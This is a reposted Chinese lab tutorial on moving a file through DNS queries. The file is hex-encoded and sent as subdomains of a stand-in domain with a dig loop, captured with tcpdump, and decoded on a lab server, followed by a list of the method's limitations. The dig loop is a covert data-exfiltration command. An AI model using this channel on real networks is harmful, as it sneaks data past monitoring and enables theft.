File-transfer-via-DNS
来源:互联网 发布:淘宝加盟被骗怎么投诉 编辑:程序博客网 时间:2024/06/03 08:38
原文 http://www.aldeid.com/wiki/File-transfer-via-DNS
测试环境:
- Client: 192.168.106.134
- Server: 192.168.106.131, running bind9 DNS server
Demo:
编码:
在客户端,准备纯文本文件:
client$ cat > loremipsum.txt << EOFLorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmodtempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodoconsequat. Duis aute irure dolor in reprehenderit in voluptate velit essecillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatatnon proident, sunt in culpa qui officia deserunt mollit anim id est laborum.EOF
然后hex编码:
client$ xxd -p loremipsum.txt > loremipsum.hex
传输文件:
在服务器端,开启一个tcpdump抓包:
server$ sudo tcpdump -i eth1 -s0 -w loremipsum.pcap 'port 53 and host 192.168.106.134'
在客户端,把每一行当作一个假的DNS请求发送:
client$ for b in `cat loremipsum.hex`; do dig @192.168.106.131 $b.fakednsrequest.com; done
一旦所有的请求发送完毕,停止抓包。请求内容类似:
server$ tcpdump -n -r loremipsum.pcap 'host 192.168.106.131 and host 192.168.106.134' | grep fakednsrequestreading from file loremipsum.pcap, link-type EN10MB (Ethernet)16:27:53.643447 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f.fakednsrequest.com. (97)16:27:58.644248 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f.fakednsrequest.com. (97)16:28:03.645370 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f.fakednsrequest.com. (97)16:28:08.660632 IP 192.168.106.134.55094 > 192.168.106.131.53: 46493+ A? 6e7365637465747572206164697069736963696e6720656c69742c207365.fakednsrequest.com. (97)16:28:13.663396 IP 192.168.106.134.55094 > 192.168.106.131.53: 46493+ A? 6e7365637465747572206164697069736963696e6720656c69742c207365.fakednsrequest.com. (97)16:28:18.664434 IP 192.168.106.134.55094 > 192.168.106.131.53: 46493+ A? 6e7365637465747572206164697069736963696e6720656c69742c207365.fakednsrequest.com. (97)16:28:23.677182 IP 192.168.106.134.60005 > 192.168.106.131.53: 52118+ A? 6420646f20656975736d6f642074656d706f7220696e6369646964756e74.fakednsrequest.com. (97)16:28:28.677606 IP 192.168.106.134.60005 > 192.168.106.131.53: 52118+ A? 6420646f20656975736d6f642074656d706f7220696e6369646964756e74.fakednsrequest.com. (97)16:28:33.678711 IP 192.168.106.134.60005 > 192.168.106.131.53: 52118+ A? 6420646f20656975736d6f642074656d706f7220696e6369646964756e74.fakednsrequest.com. (97)16:28:38.689582 IP 192.168.106.134.56318 > 192.168.106.131.53: 57751+ A? 207574206c61626f726520657420646f6c6f7265206d61676e6120616c69.fakednsrequest.com. (97)16:28:43.689821 IP 192.168.106.134.56318 > 192.168.106.131.53: 57751+ A? 207574206c61626f726520657420646f6c6f7265206d61676e6120616c69.fakednsrequest.com. (97)16:28:48.691096 IP 192.168.106.134.56318 > 192.168.106.131.53: 57751+ A? 207574206c61626f726520657420646f6c6f7265206d61676e6120616c69.fakednsrequest.com. (97)16:28:53.702963 IP 192.168.106.134.48932 > 192.168.106.131.53: 23279+ A? 7175612e20557420656e696d206164206d696e696d2076656e69616d2c20.fakednsrequest.com. (97)16:28:58.703995 IP 192.168.106.134.48932 > 192.168.106.131.53: 23279+ A? 7175612e20557420656e696d206164206d696e696d2076656e69616d2c20.fakednsrequest.com. (97)16:29:03.705035 IP 192.168.106.134.48932 > 192.168.106.131.53: 23279+ A? 7175612e20557420656e696d206164206d696e696d2076656e69616d2c20.fakednsrequest.com. (97)16:29:08.723883 IP 192.168.106.134.48334 > 192.168.106.131.53: 6065+ A? 71756973206e6f737472756420657865726369746174696f6e20756c6c61.fakednsrequest.com. (97)16:29:13.724759 IP 192.168.106.134.48334 > 192.168.106.131.53: 6065+ A? 71756973206e6f737472756420657865726369746174696f6e20756c6c61.fakednsrequest.com. (97)16:29:18.725429 IP 192.168.106.134.48334 > 192.168.106.131.53: 6065+ A? 71756973206e6f737472756420657865726369746174696f6e20756c6c61.fakednsrequest.com. (97)16:29:23.736561 IP 192.168.106.134.48875 > 192.168.106.131.53: 35508+ A? 6d636f206c61626f726973206e69736920757420616c6971756970206578.fakednsrequest.com. (97)16:29:28.737793 IP 192.168.106.134.48875 > 192.168.106.131.53: 35508+ A? 6d636f206c61626f726973206e69736920757420616c6971756970206578.fakednsrequest.com. (97)16:29:33.738747 IP 192.168.106.134.48875 > 192.168.106.131.53: 35508+ A? 6d636f206c61626f726973206e69736920757420616c6971756970206578.fakednsrequest.com. (97)16:29:38.793934 IP 192.168.106.134.54201 > 192.168.106.131.53: 47339+ A? 20656120636f6d6d6f646f20636f6e7365717561742e2044756973206175.fakednsrequest.com. (97)16:29:43.794793 IP 192.168.106.134.54201 > 192.168.106.131.53: 47339+ A? 20656120636f6d6d6f646f20636f6e7365717561742e2044756973206175.fakednsrequest.com. (97)16:29:48.795804 IP 192.168.106.134.54201 > 192.168.106.131.53: 47339+ A? 20656120636f6d6d6f646f20636f6e7365717561742e2044756973206175.fakednsrequest.com. (97)16:29:53.839608 IP 192.168.106.134.40822 > 192.168.106.131.53: 27672+ A? 746520697275726520646f6c6f7220696e20726570726568656e64657269.fakednsrequest.com. (97)16:29:58.820917 IP 192.168.106.134.40822 > 192.168.106.131.53: 27672+ A? 746520697275726520646f6c6f7220696e20726570726568656e64657269.fakednsrequest.com. (97)16:30:03.821932 IP 192.168.106.134.40822 > 192.168.106.131.53: 27672+ A? 746520697275726520646f6c6f7220696e20726570726568656e64657269.fakednsrequest.com. (97)16:30:08.865585 IP 192.168.106.134.36479 > 192.168.106.131.53: 61438+ A? 7420696e20766f6c7570746174652076656c697420657373652063696c6c.fakednsrequest.com. (97)16:30:13.867062 IP 192.168.106.134.36479 > 192.168.106.131.53: 61438+ A? 7420696e20766f6c7570746174652076656c697420657373652063696c6c.fakednsrequest.com. (97)16:30:18.868091 IP 192.168.106.134.36479 > 192.168.106.131.53: 61438+ A? 7420696e20766f6c7570746174652076656c697420657373652063696c6c.fakednsrequest.com. (97)16:30:23.914226 IP 192.168.106.134.56473 > 192.168.106.131.53: 39998+ A? 756d20646f6c6f726520657520667567696174206e756c6c612070617269.fakednsrequest.com. (97)16:30:28.914082 IP 192.168.106.134.56473 > 192.168.106.131.53: 39998+ A? 756d20646f6c6f726520657520667567696174206e756c6c612070617269.fakednsrequest.com. (97)16:30:33.916140 IP 192.168.106.134.56473 > 192.168.106.131.53: 39998+ A? 756d20646f6c6f726520657520667567696174206e756c6c612070617269.fakednsrequest.com. (97)16:30:38.967663 IP 192.168.106.134.33293 > 192.168.106.131.53: 22194+ A? 617475722e204578636570746575722073696e74206f6363616563617420.fakednsrequest.com. (97)16:30:43.969259 IP 192.168.106.134.33293 > 192.168.106.131.53: 22194+ A? 617475722e204578636570746575722073696e74206f6363616563617420.fakednsrequest.com. (97)16:30:48.960339 IP 192.168.106.134.33293 > 192.168.106.131.53: 22194+ A? 617475722e204578636570746575722073696e74206f6363616563617420.fakednsrequest.com. (97)16:30:54.018795 IP 192.168.106.134.40212 > 192.168.106.131.53: 24058+ A? 637570696461746174206e6f6e2070726f6964656e742c2073756e742069.fakednsrequest.com. (97)16:30:59.019316 IP 192.168.106.134.40212 > 192.168.106.131.53: 24058+ A? 637570696461746174206e6f6e2070726f6964656e742c2073756e742069.fakednsrequest.com. (97)16:31:04.010034 IP 192.168.106.134.40212 > 192.168.106.131.53: 24058+ A? 637570696461746174206e6f6e2070726f6964656e742c2073756e742069.fakednsrequest.com. (97)16:31:09.067424 IP 192.168.106.134.46047 > 192.168.106.131.53: 10148+ A? 6e2063756c706120717569206f666669636961206465736572756e74206d.fakednsrequest.com. (97)16:31:14.068462 IP 192.168.106.134.46047 > 192.168.106.131.53: 10148+ A? 6e2063756c706120717569206f666669636961206465736572756e74206d.fakednsrequest.com. (97)16:31:19.069481 IP 192.168.106.134.46047 > 192.168.106.131.53: 10148+ A? 6e2063756c706120717569206f666669636961206465736572756e74206d.fakednsrequest.com. (97)16:31:24.140100 IP 192.168.106.134.53254 > 192.168.106.131.53: 9356+ A? 6f6c6c697420616e696d20696420657374206c61626f72756d2e0a.fakednsrequest.com. (91)16:31:29.141466 IP 192.168.106.134.53254 > 192.168.106.131.53: 9356+ A? 6f6c6c697420616e696d20696420657374206c61626f72756d2e0a.fakednsrequest.com. (91)16:31:34.142622 IP 192.168.106.134.53254 > 192.168.106.131.53: 9356+ A? 6f6c6c697420616e696d20696420657374206c61626f72756d2e0a.fakednsrequest.com. (91)
解码文件:
使用一连串的cut命令提取十六进制文件:
server$ tcpdump -n -r loremipsum.pcap 'host 192.168.106.131 and host 192.168.106.134' | grep fakednsrequest | cut -d ' ' -f 8 | cut -d '.' -f 1 | uniq > loremipsum.hex
现在解码文件:
$ xxd -r -p < loremipsum.hexLorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmodtempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodoconsequat. Duis aute irure dolor in reprehenderit in voluptate velit essecillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatatnon proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
限制:
- 数据不封装
- DNS请求貌似合法
- 传输文件是源文件2倍大小
- 由于频繁的请求可以引起怀疑,所以它可以变得相对可见
- 由于源文件的大小,花费时间可能较长
- 除非在十六进制编码之前加密,否则可以很方便解码
- 大文件可能丢包(UDP)
0 0
- File-transfer-via-DNS
- Transfer Error: "encountered 1 errors during the transfer" via SSH Secure File Transfer
- File Transfer
- File Transfer
- File Transfer
- File Transfer
- File Transfer
- RFC959 - File Transfer Protocol
- Android file transfer/Upload
- FTP, File Transfer Protocol
- 5-8 File Transfer
- send file descriptor via socket
- keil error:malformed via file....
- Python transfer file through xmlrpc
- XMPP file Transfer (转)
- FTP(File Transfer Protocol)Server
- File transfer over sound card
- 04-树5. File Transfer
- Ubuntu 12.04中文输入法的安装
- 百度地图编程注意事项
- Android简介
- 二分搜索-切蛋糕
- 【openCV】openCV2.4.8在vs2010旗舰版中的配置
- File-transfer-via-DNS
- poj3261(后缀数组求至少出现k次的最长子串可重叠)
- ASP.NET全Cookie的遍历
- Hadoop 自定义Writable NullPointerException
- Hadoop 2.2.0 安装 (4台CentOs 虚拟机)
- oracle索引 一复合索引
- 用概率模拟法求圆周率pi
- [转]oracle删除一个表
- 第一周作业2——《算法概论》思维导图
